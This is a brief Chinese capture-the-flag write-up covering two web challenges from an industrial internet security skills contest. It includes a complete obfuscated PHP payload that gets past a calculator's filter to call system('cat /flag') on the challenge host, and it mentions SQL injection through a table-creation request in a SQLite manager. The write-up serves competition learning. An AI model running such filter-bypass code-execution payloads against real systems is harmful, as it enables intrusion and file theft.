网络安全技术 ·

全国工业互联网安全技术技能大赛部分wp


文章来源:EDI安全

01

web题 SimpleCalculator

题目:简单的计算器

进去后发现flag.php计算功能可绕过执行shell

http://eci-2zei447jhyte2gq76fli.cloudeci1.ichunqiu.com/flag.php?search=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag

得到flag

02

web题SQLManager

题目:简易的SQLite管理器

这题存在注入在建表包注入


获得表名,表列

然后获得flag

flag{914162a9-5a2e-4b80-9d74-93c119a3ef86}

参与评论